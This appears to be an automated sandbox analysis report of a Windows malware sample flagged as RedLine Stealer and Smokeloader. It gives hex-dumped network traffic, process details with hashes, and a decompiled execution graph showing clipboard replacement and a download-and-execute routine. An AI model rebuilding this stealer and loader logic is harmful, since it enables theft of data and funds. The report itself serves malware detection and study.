                                                                                                                                                                                                                              2025-01-12 16:45:32 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                              2025-01-12 16:45:32 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                              Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:11:45:21
                                                                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\lBb4XI4eGD.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\lBb4XI4eGD.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:458'240 bytes
                                                                                                                                                                                                                              MD5 hash:4C9A8F87A919E9FCCD2476B3689D05DE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:11:45:27
                                                                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:403'968 bytes
                                                                                                                                                                                                                              MD5 hash:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1651009881.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                              • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 1004
                                                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:2.2%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                                                                Signature Coverage:5.7%
                                                                                                                                                                                                                                Total number of Nodes:759
                                                                                                                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                                                                                                                execution_graph 65025 402ba3 RegCreateKeyExW 65026 402bd1 RegSetValueExW 65025->65026 65027 402be5 65025->65027 65026->65027 65028 402bf3 65027->65028 65029 402bea RegCloseKey 65027->65029 65029->65028 65030 404b84 65031 404b90 Concurrency::details::SchedulerBase::CheckStaticConstruction 65030->65031 65036 40fb02 65031->65036 65035 404bb0 Concurrency::details::SchedulerBase::CheckStaticConstruction Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::remove 65039 40fb07 65036->65039 65038 404b99 65044 4051c6 65038->65044 65039->65038 65041 40fb23 Concurrency::details::ResourceManager::CaptureProcessAffinity 65039->65041 65060 42ad6e 65039->65060 65067 42f440 7 API calls 2 library calls 65039->65067 65068 4285fd RaiseException 65041->65068 65043 4103bc 65045 4051d2 Concurrency::details::SchedulerBase::CheckStaticConstruction __Cnd_init 65044->65045 65048 4051ea __Mtx_init 65045->65048 65079 40ce28 28 API calls std::_Throw_Cpp_error 65045->65079 65047 405211 65071 4010ea 65047->65071 65048->65047 65080 40ce28 28 API calls std::_Throw_Cpp_error 65048->65080 65054 405260 65056 405275 Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::remove 65054->65056 65082 401128 30 API calls 2 library calls 65054->65082 65083 401109 65056->65083 65059 40529a Concurrency::details::SchedulerBase::CheckStaticConstruction 65059->65035 65062 433697 __Thrd_start 65060->65062 65061 4336d5 65070 42eab9 20 API calls __dosmaperr 65061->65070 65062->65061 65063 4336c0 RtlAllocateHeap 65062->65063 65069 42f440 7 API calls 2 library calls 65062->65069 65063->65062 65065 4336d3 65063->65065 65065->65039 65067->65039 65068->65043 65069->65062 65070->65065 65087 40d309 65071->65087 65075 401103 65076 40cee9 65075->65076 65119 42e104 65076->65119 65079->65048 65080->65047 65081 40ce28 28 API calls std::_Throw_Cpp_error 65081->65054 65082->65054 65084 401115 __Mtx_unlock 65083->65084 65085 401122 65084->65085 65451 40ce28 28 API calls std::_Throw_Cpp_error 65084->65451 65085->65059 65091 40d063 65087->65091 65090 40ce28 28 API calls std::_Throw_Cpp_error 65090->65075 65092 40d0b9 65091->65092 65093 40d08b GetCurrentThreadId 65091->65093 65095 40d0e3 65092->65095 65096 40d0bd GetCurrentThreadId 65092->65096 65094 40d096 GetCurrentThreadId 65093->65094 65105 40d0b1 65093->65105 65094->65105 65097 40d17c GetCurrentThreadId 65095->65097 65100 40d103 65095->65100 65098 40d0cc 65096->65098 65097->65098 65099 40d1d3 GetCurrentThreadId 65098->65099 65098->65105 65099->65105 65116 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65100->65116 65104 4010f6 65104->65075 65104->65090 65109 40f8c5 65105->65109 65106 40d13b GetCurrentThreadId 65106->65098 65107 40d10e __Xtime_diff_to_millis2 65106->65107 65107->65098 65107->65105 65107->65106 65117 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65107->65117 65110 40f8d0 IsProcessorFeaturePresent 65109->65110 65111 40f8ce 65109->65111 65113 40f943 65110->65113 65111->65104 65118 40f907 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65113->65118 65115 40fa26 65115->65104 65116->65107 65117->65107 65118->65115 65120 42e111 65119->65120 65121 42e125 65119->65121 65142 42eab9 20 API calls __dosmaperr 65120->65142 65133 42e0bb 65121->65133 65125 42e116 65143 42a58d 26 API calls _Deallocate 65125->65143 65127 42e13a CreateThread 65129 42e165 65127->65129 65130 42e159 GetLastError 65127->65130 65171 42dfb0 65127->65171 65128 40524d 65128->65054 65128->65081 65145 42e02d 65129->65145 65144 42ea83 20 API calls __dosmaperr 65130->65144 65153 434d1a 65133->65153 65137 42e0d4 65138 42e0f3 65137->65138 65139 42e0db GetModuleHandleExW 65137->65139 65140 42e02d __Thrd_start 22 API calls 65138->65140 65139->65138 65141 42e0fd 65140->65141 65141->65127 65141->65129 65142->65125 65143->65128 65144->65129 65146 42e03a 65145->65146 65152 42e05e 65145->65152 65147 42e040 CloseHandle 65146->65147 65148 42e049 65146->65148 65147->65148 65149 42e058 65148->65149 65150 42e04f FreeLibrary 65148->65150 65151 43345a _free 20 API calls 65149->65151 65150->65149 65151->65152 65152->65128 65154 434d27 65153->65154 65155 434d67 65154->65155 65156 434d52 HeapAlloc 65154->65156 65160 434d3b __Thrd_start 65154->65160 65169 42eab9 20 API calls __dosmaperr 65155->65169 65157 434d65 65156->65157 65156->65160 65159 42e0cb 65157->65159 65162 43345a 65159->65162 65160->65155 65160->65156 65168 42f440 7 API calls 2 library calls 65160->65168 65163 43348e __dosmaperr 65162->65163 65164 433465 HeapFree 65162->65164 65163->65137 65164->65163 65165 43347a 65164->65165 65170 42eab9 20 API calls __dosmaperr 65165->65170 65167 433480 GetLastError 65167->65163 65168->65160 65169->65159 65170->65167 65172 42dfbc _Atexit 65171->65172 65173 42dfc3 GetLastError ExitThread 65172->65173 65174 42dfd0 65172->65174 65187 431eca GetLastError 65174->65187 65176 42dfd5 65207 435561 65176->65207 65180 42dfeb 65214 401169 65180->65214 65188 431ee0 65187->65188 65189 431ee6 65187->65189 65222 435101 11 API calls 2 library calls 65188->65222 65190 434d1a __Thrd_start 20 API calls 65189->65190 65193 431f35 SetLastError 65189->65193 65192 431ef8 65190->65192 65194 431f00 65192->65194 65223 435157 11 API calls 2 library calls 65192->65223 65193->65176 65196 43345a _free 20 API calls 65194->65196 65198 431f06 65196->65198 65197 431f15 65197->65194 65199 431f1c 65197->65199 65200 431f41 SetLastError 65198->65200 65224 431d3c 20 API calls __Toupper 65199->65224 65225 42df6d 167 API calls 2 library calls 65200->65225 65203 431f27 65205 43345a _free 20 API calls 65203->65205 65204 431f4d 65206 431f2e 65205->65206 65206->65193 65206->65200 65208 435586 65207->65208 65209 43557c 65207->65209 65226 434e83 5 API calls 2 library calls 65208->65226 65211 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65209->65211 65212 42dfe0 65211->65212 65212->65180 65221 435494 10 API calls 2 library calls 65212->65221 65213 43559d 65213->65209 65227 4057f6 65214->65227 65240 40155a Sleep 65214->65240 65215 401173 65218 42e189 65215->65218 65419 42e064 65218->65419 65220 42e196 65221->65180 65222->65189 65223->65197 65224->65203 65225->65204 65226->65213 65228 405802 Concurrency::details::SchedulerBase::CheckStaticConstruction 65227->65228 65229 4010ea std::_Cnd_initX 35 API calls 65228->65229 65231 405817 __Cnd_signal 65229->65231 65230 40582f 65233 401109 std::_Cnd_initX 28 API calls 65230->65233 65231->65230 65286 40ce28 28 API calls std::_Throw_Cpp_error 65231->65286 65234 405838 65233->65234 65242 4016df 65234->65242 65263 4029ea InternetOpenW 65234->65263 65237 40583f Concurrency::details::SchedulerBase::CheckStaticConstruction Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::remove 65237->65215 65241 4016d5 65240->65241 65287 40fddc 65242->65287 65244 4016eb Sleep 65288 40cc06 65244->65288 65247 40cc06 28 API calls 65248 401711 65247->65248 65249 40171b OpenClipboard 65248->65249 65250 401943 Sleep 65249->65250 65251 40172b GetClipboardData 65249->65251 65250->65249 65252 40173b GlobalLock 65251->65252 65253 40193d CloseClipboard 65251->65253 65252->65253 65254 401748 _strlen 65252->65254 65253->65250 65254->65253 65255 40cbbd 28 API calls std::system_error::system_error 65254->65255 65256 40cc06 28 API calls 65254->65256 65258 4018d2 EmptyClipboard GlobalAlloc 65254->65258 65292 402e5c 167 API calls 2 library calls 65254->65292 65294 40ca9c 26 API calls _Deallocate 65254->65294 65255->65254 65256->65254 65258->65254 65259 4018eb GlobalLock 65258->65259 65293 426980 65259->65293 65262 401905 GlobalUnlock SetClipboardData GlobalFree 65262->65254 65264 402b92 65263->65264 65265 402a1d InternetOpenUrlW 65263->65265 65268 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65264->65268 65265->65264 65266 402a33 GetTempPathW GetTempFileNameW 65265->65266 65300 42a87e 65266->65300 65270 402ba1 65268->65270 65279 40e761 65270->65279 65271 402b81 InternetCloseHandle InternetCloseHandle 65271->65264 65272 402a9e ListArray 65273 402ab6 InternetReadFile WriteFile 65272->65273 65274 402af6 CloseHandle 65272->65274 65273->65272 65302 402956 65274->65302 65277 402b21 ShellExecuteExW 65277->65271 65278 402b68 WaitForSingleObject CloseHandle 65277->65278 65278->65271 65410 40dee0 65279->65410 65284 40e806 65284->65237 65285 40e778 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65417 40deec LeaveCriticalSection std::_Lockit::~_Lockit 65285->65417 65286->65230 65287->65244 65289 40cc22 _strlen 65288->65289 65295 40cbbd 65289->65295 65291 401704 65291->65247 65292->65254 65293->65262 65294->65254 65296 40cbf0 65295->65296 65297 40cbcc BuildCatchObjectHelperInternal 65295->65297 65296->65297 65299 40cb52 28 API calls 4 library calls 65296->65299 65297->65291 65299->65297 65301 402a6c CreateFileW 65300->65301 65301->65271 65301->65272 65303 402981 ListArray _wcslen 65302->65303 65312 42b444 65303->65312 65307 4029ae 65334 404329 65307->65334 65310 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65311 4029e8 65310->65311 65311->65271 65311->65277 65338 42b0f6 65312->65338 65315 402819 65316 402828 Concurrency::details::SchedulerBase::CheckStaticConstruction 65315->65316 65364 4032d3 65316->65364 65318 40283c 65380 403b81 65318->65380 65320 402850 65321 402862 65320->65321 65322 40287e 65320->65322 65407 403290 167 API calls 65321->65407 65386 403108 65322->65386 65325 40288b 65389 403c16 65325->65389 65327 40289d 65399 403cb8 65327->65399 65328 402875 std::ios_base::_Ios_base_dtor Concurrency::details::SchedulerBase::CheckStaticConstruction 65328->65307 65330 4028ba 65331 404329 26 API calls 65330->65331 65332 4028d9 65331->65332 65408 403290 167 API calls 65332->65408 65335 404331 65334->65335 65336 4029da 65334->65336 65409 40cc8c 26 API calls 2 library calls 65335->65409 65336->65310 65339 42b123 65338->65339 65340 42b132 65339->65340 65341 42b14a 65339->65341 65353 42b127 65339->65353 65343 42eab9 __dosmaperr 20 API calls 65340->65343 65342 42a737 __fassign 162 API calls 65341->65342 65344 42b155 65342->65344 65346 42b137 65343->65346 65347 42b160 65344->65347 65348 42b2f7 65344->65348 65345 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65349 40299a 65345->65349 65350 42a58d ___std_exception_copy 26 API calls 65346->65350 65354 42b208 WideCharToMultiByte 65347->65354 65356 42b16b 65347->65356 65361 42b1a5 WideCharToMultiByte 65347->65361 65351 42b324 WideCharToMultiByte 65348->65351 65352 42b302 65348->65352 65349->65315 65350->65353 65351->65352 65352->65353 65355 42eab9 __dosmaperr 20 API calls 65352->65355 65353->65345 65354->65356 65357 42b233 65354->65357 65355->65353 65356->65353 65360 42eab9 __dosmaperr 20 API calls 65356->65360 65357->65356 65359 42b23c GetLastError 65357->65359 65359->65356 65363 42b24b 65359->65363 65360->65353 65361->65356 65362 42b264 WideCharToMultiByte 65362->65352 65362->65363 65363->65352 65363->65353 65363->65362 65365 4032df Concurrency::details::SchedulerBase::CheckStaticConstruction 65364->65365 65366 404672 167 API calls 65365->65366 65367 40330b 65366->65367 65368 404843 167 API calls 65367->65368 65369 403334 65368->65369 65370 404582 26 API calls 65369->65370 65371 403343 65370->65371 65372 403388 std::ios_base::_Ios_base_dtor 65371->65372 65373 40ddd9 167 API calls 65371->65373 65374 4033c4 Concurrency::details::SchedulerBase::CheckStaticConstruction 65372->65374 65376 40c60e 167 API calls 65372->65376 65375 403358 65373->65375 65374->65318 65375->65372 65377 404582 26 API calls 65375->65377 65376->65374 65378 403369 65377->65378 65379 404c0a 167 API calls 65378->65379 65379->65372 65381 403b8d Concurrency::details::SchedulerBase::CheckStaticConstruction 65380->65381 65382 4042a5 167 API calls 65381->65382 65383 403b99 65382->65383 65384 403bbd Concurrency::details::SchedulerBase::CheckStaticConstruction 65383->65384 65385 4034f1 167 API calls 65383->65385 65384->65320 65385->65384 65387 40434c 28 API calls 65386->65387 65388 403122 ListArray 65387->65388 65388->65325 65390 403c22 Concurrency::details::SchedulerBase::CheckStaticConstruction 65389->65390 65391 40c60e 167 API calls 65390->65391 65392 403c45 65391->65392 65393 4042a5 167 API calls 65392->65393 65394 403c4f 65393->65394 65395 403c92 Concurrency::details::SchedulerBase::CheckStaticConstruction 65394->65395 65398 4034f1 167 API calls 65394->65398 65395->65327 65396 403c70 65396->65395 65397 4046c0 167 API calls 65396->65397 65397->65395 65398->65396 65400 403cc4 __EH_prolog3_catch 65399->65400 65401 4042a5 167 API calls 65400->65401 65403 403cdd 65401->65403 65402 4046c0 167 API calls 65405 403d66 Concurrency::details::SchedulerBase::CheckStaticConstruction 65402->65405 65404 403d0d 65403->65404 65406 403695 40 API calls 65403->65406 65404->65402 65405->65330 65406->65404 65407->65328 65408->65328 65409->65336 65418 40f220 EnterCriticalSection 65410->65418 65412 40deea 65413 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65412->65413 65414 40cec8 65413->65414 65415 40cebd CloseHandle 65413->65415 65416 40cecc GetCurrentThreadId 65414->65416 65415->65416 65416->65285 65417->65284 65418->65412 65428 431f4e GetLastError 65419->65428 65421 42e073 ExitThread 65424 42e091 65425 42e09d CloseHandle 65424->65425 65426 42e0a4 65424->65426 65425->65426 65426->65421 65427 42e0b0 FreeLibraryAndExitThread 65426->65427 65429 431f6d 65428->65429 65430 431f67 65428->65430 65432 434d1a __Thrd_start 17 API calls 65429->65432 65434 431fc4 SetLastError 65429->65434 65448 435101 11 API calls 2 library calls 65430->65448 65433 431f7f 65432->65433 65435 431f87 65433->65435 65449 435157 11 API calls 2 library calls 65433->65449 65437 42e06f 65434->65437 65439 43345a _free 17 API calls 65435->65439 65437->65421 65437->65424 65447 4354e6 10 API calls 2 library calls 65437->65447 65438 431f9c 65438->65435 65440 431fa3 65438->65440 65441 431f8d 65439->65441 65450 431d3c 20 API calls __Toupper 65440->65450 65442 431fbb SetLastError 65441->65442 65442->65437 65444 431fae 65445 43345a _free 17 API calls 65444->65445 65446 431fb4 65445->65446 65446->65434 65446->65442 65447->65424 65448->65429 65449->65438 65450->65444 65451->65085 65452 402394 65453 402557 PostQuitMessage 65452->65453 65454 4023a8 65452->65454 65458 402555 65453->65458 65455 4023af DefWindowProcW 65454->65455 65456 4023c6 65454->65456 65455->65458 65457 4029ea 167 API calls 65456->65457 65456->65458 65457->65458 65459 432775 65464 432543 65459->65464 65462 43279d 65465 43256e 65464->65465 65472 4326b7 65465->65472 65479 43c8be 170 API calls 2 library calls 65465->65479 65467 432761 65483 42a58d 26 API calls _Deallocate 65467->65483 65469 4326c0 65469->65462 65476 43d00c 65469->65476 65471 432701 65471->65472 65480 43c8be 170 API calls 2 library calls 65471->65480 65472->65469 65482 42eab9 20 API calls __dosmaperr 65472->65482 65474 432720 65474->65472 65481 43c8be 170 API calls 2 library calls 65474->65481 65484 43c9e1 65476->65484 65478 43d027 65478->65462 65479->65471 65480->65474 65481->65472 65482->65467 65483->65469 65487 43c9ed __FrameHandler3::FrameUnwindToState 65484->65487 65485 43c9fb 65502 42eab9 20 API calls __dosmaperr 65485->65502 65487->65485 65489 43ca34 65487->65489 65488 43ca00 65503 42a58d 26 API calls _Deallocate 65488->65503 65495 43cfbb 65489->65495 65494 43ca0a __fread_nolock 65494->65478 65505 43f931 65495->65505 65500 43345a _free 20 API calls 65501 43ca58 65500->65501 65504 43ca81 LeaveCriticalSection __wsopen_s 65501->65504 65502->65488 65503->65494 65504->65494 65506 43f954 65505->65506 65507 43f93d 65505->65507 65509 43f973 65506->65509 65510 43f95c 65506->65510 65576 42eab9 20 API calls __dosmaperr 65507->65576 65580 434f9a 10 API calls 2 library calls 65509->65580 65578 42eab9 20 API calls __dosmaperr 65510->65578 65512 43f942 65577 42a58d 26 API calls _Deallocate 65512->65577 65514 43f961 65579 42a58d 26 API calls _Deallocate 65514->65579 65515 43f97a MultiByteToWideChar 65518 43f9a9 65515->65518 65519 43f999 GetLastError 65515->65519 65582 433697 21 API calls 3 library calls 65518->65582 65581 42ea83 20 API calls __dosmaperr 65519->65581 65522 43cfd1 65522->65501 65529 43d02c 65522->65529 65523 43f9b1 65524 43f9d9 65523->65524 65525 43f9b8 MultiByteToWideChar 65523->65525 65526 43345a _free 20 API calls 65524->65526 65525->65524 65527 43f9cd GetLastError 65525->65527 65526->65522 65583 42ea83 20 API calls __dosmaperr 65527->65583 65584 43cd8f 65529->65584 65532 43d077 65602 43976e 65532->65602 65533 43d05e 65616 42eaa6 20 API calls __dosmaperr 65533->65616 65536 43d07c 65537 43d085 65536->65537 65538 43d09c 65536->65538 65618 42eaa6 20 API calls __dosmaperr 65537->65618 65615 43ccfa CreateFileW 65538->65615 65542 43d08a 65619 42eab9 20 API calls __dosmaperr 65542->65619 65543 43d0d5 65545 43d152 GetFileType 65543->65545 65547 43d127 GetLastError 65543->65547 65620 43ccfa CreateFileW 65543->65620 65546 43d15d GetLastError 65545->65546 65550 43d1a4 65545->65550 65622 42ea83 20 API calls __dosmaperr 65546->65622 65621 42ea83 20 API calls __dosmaperr 65547->65621 65624 4396b7 21 API calls 2 library calls 65550->65624 65551 43d063 65617 42eab9 20 API calls __dosmaperr 65551->65617 65552 43d16b CloseHandle 65552->65551 65556 43d194 65552->65556 65555 43d11a 65555->65545 65555->65547 65623 42eab9 20 API calls __dosmaperr 65556->65623 65557 43d1c5 65559 43d211 65557->65559 65625 43cf0b 169 API calls 3 library calls 65557->65625 65564 43d23e 65559->65564 65626 43caad 167 API calls 4 library calls 65559->65626 65560 43d199 65560->65551 65563 43d237 65563->65564 65565 43d24f 65563->65565 65627 4335bd 29 API calls 2 library calls 65564->65627 65567 43cff9 65565->65567 65568 43d2cd CloseHandle 65565->65568 65567->65500 65628 43ccfa CreateFileW 65568->65628 65570 43d2f8 65571 43d302 GetLastError 65570->65571 65575 43d247 65570->65575 65629 42ea83 20 API calls __dosmaperr 65571->65629 65573 43d30e 65630 439880 21 API calls 2 library calls 65573->65630 65575->65567 65576->65512 65577->65522 65578->65514 65579->65522 65580->65515 65581->65522 65582->65523 65583->65524 65585 43cdb0 65584->65585 65591 43cdca 65584->65591 65585->65591 65638 42eab9 20 API calls __dosmaperr 65585->65638 65588 43cdbf 65639 42a58d 26 API calls _Deallocate 65588->65639 65590 43ce02 65592 43ce31 65590->65592 65640 42eab9 20 API calls __dosmaperr 65590->65640 65631 43cd1f 65591->65631 65599 43ce84 65592->65599 65642 42ffcf 26 API calls 2 library calls 65592->65642 65595 43ce7f 65597 43cefe 65595->65597 65595->65599 65596 43ce26 65641 42a58d 26 API calls _Deallocate 65596->65641 65643 42a5ba 11 API calls _Atexit 65597->65643 65599->65532 65599->65533 65601 43cf0a 65603 43977a __FrameHandler3::FrameUnwindToState 65602->65603 65646 42e3dd EnterCriticalSection 65603->65646 65605 4397a6 65650 43954d 21 API calls 3 library calls 65605->65650 65606 439781 65606->65605 65611 439814 EnterCriticalSection 65606->65611 65614 4397c8 65606->65614 65609 4397f1 __fread_nolock 65609->65536 65610 4397ab 65610->65614 65651 439694 EnterCriticalSection 65610->65651 65612 439821 LeaveCriticalSection 65611->65612 65611->65614 65612->65606 65647 439877 65614->65647 65615->65543 65616->65551 65617->65567 65618->65542 65619->65551 65620->65555 65621->65551 65622->65552 65623->65560 65624->65557 65625->65559 65626->65563 65627->65575 65628->65570 65629->65573 65630->65575 65632 43cd37 65631->65632 65634 43cd52 65632->65634 65644 42eab9 20 API calls __dosmaperr 65632->65644 65634->65590 65635 43cd76 65645 42a58d 26 API calls _Deallocate 65635->65645 65637 43cd81 65637->65590 65638->65588 65639->65591 65640->65596 65641->65592 65642->65595 65643->65601 65644->65635 65645->65637 65646->65606 65652 42e425 LeaveCriticalSection 65647->65652 65649 43987e 65649->65609 65650->65610 65651->65614 65652->65649 65653 214003c 65654 2140049 65653->65654 65668 2140e0f SetErrorMode SetErrorMode 65654->65668 65659 2140265 65660 21402ce VirtualProtect 65659->65660 65662 214030b 65660->65662 65661 2140439 VirtualFree 65666 21405f4 LoadLibraryA 65661->65666 65667 21404be 65661->65667 65662->65661 65663 21404e3 LoadLibraryA 65663->65667 65665 21408c7 65666->65665 65667->65663 65667->65666 65669 2140223 65668->65669 65670 2140d90 65669->65670 65671 2140dad 65670->65671 65672 2140dbb GetPEB 65671->65672 65673 2140238 VirtualAlloc 65671->65673 65672->65673 65673->65659 65674 4340fa 65675 434106 __FrameHandler3::FrameUnwindToState 65674->65675 65676 434112 65675->65676 65677 434129 65675->65677 65708 42eab9 20 API calls __dosmaperr 65676->65708 65687 42caef EnterCriticalSection 65677->65687 65680 434117 65709 42a58d 26 API calls _Deallocate 65680->65709 65681 434139 65688 434176 65681->65688 65684 434145 65710 43416c LeaveCriticalSection __fread_nolock 65684->65710 65686 434122 __fread_nolock 65687->65681 65689 434184 65688->65689 65690 43419e 65688->65690 65721 42eab9 20 API calls __dosmaperr 65689->65721 65711 4328f8 65690->65711 65693 4341a7 65718 4347c3 65693->65718 65694 434189 65722 42a58d 26 API calls _Deallocate 65694->65722 65697 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65697->65684 65699 4342ab 65701 4342b8 65699->65701 65704 43425e 65699->65704 65700 43422f 65703 43424c 65700->65703 65700->65704 65724 42eab9 20 API calls __dosmaperr 65701->65724 65723 43448f 31 API calls 4 library calls 65703->65723 65704->65697 65725 43430b 30 API calls 2 library calls 65704->65725 65706 434256 65706->65697 65708->65680 65709->65686 65710->65686 65712 432904 65711->65712 65713 432919 65711->65713 65726 42eab9 20 API calls __dosmaperr 65712->65726 65713->65693 65715 432909 65727 42a58d 26 API calls _Deallocate 65715->65727 65717 432914 65717->65693 65728 434640 65718->65728 65720 4341c3 65720->65697 65720->65699 65720->65700 65721->65694 65722->65697 65723->65706 65724->65697 65725->65697 65726->65715 65727->65717 65729 43464c __FrameHandler3::FrameUnwindToState 65728->65729 65730 434654 65729->65730 65731 43466c 65729->65731 65763 42eaa6 20 API calls __dosmaperr 65730->65763 65733 434720 65731->65733 65738 4346a4 65731->65738 65768 42eaa6 20 API calls __dosmaperr 65733->65768 65734 434659 65764 42eab9 20 API calls __dosmaperr 65734->65764 65737 434725 65769 42eab9 20 API calls __dosmaperr 65737->65769 65753 439694 EnterCriticalSection 65738->65753 65741 434661 __fread_nolock 65741->65720 65742 43472d 65770 42a58d 26 API calls _Deallocate 65742->65770 65743 4346aa 65745 4346e3 65743->65745 65746 4346ce 65743->65746 65754 434745 65745->65754 65765 42eab9 20 API calls __dosmaperr 65746->65765 65749 4346d3 65766 42eaa6 20 API 